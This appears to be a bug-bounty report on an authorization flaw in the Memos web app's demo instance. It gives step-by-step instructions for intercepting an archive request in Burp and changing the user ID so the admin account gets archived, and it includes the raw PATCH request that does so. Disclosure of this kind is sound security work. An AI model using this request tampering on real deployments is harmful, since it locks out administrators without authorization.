Description

As fer the Flow Admin can’t ARCHIVE OWN account .

i was able to ARCHIVE ADMIN OWN Account by intercept the request and change ID Value to Admin.

which leads to ARCHIVED the ADMIN Account , :/ Please Restored it

Might Be possible to DELETE Admin Account too , after ARCHIVE Account it’s not accessable to test further ,

1.  Login to Admin Account .
2.  Go to Setting , click on user list 
3. click on ARCHIVE any user 
4 . intercept The request in burp 
5. Change the user ID to Admin ID
6 . and forword the request.
7. ADMIN Account is ARCHIVED by OWN , as we Dont have permission  to ARCHIVE  own Admin Account. 

POC:  https://drive.google.com/file/d/1zYOAfe1tZr2K0IKhy7ZU7kgpB_O-s48j/view?usp=share_link

after Attack:

not able to Access it again :)

PATCH /api/user/101 HTTP/2
Host: demo.usememos.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 33
Referer: https://demo.usememos.com/?shortcutId=10
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"id":101,"rowStatus":"ARCHIVED"}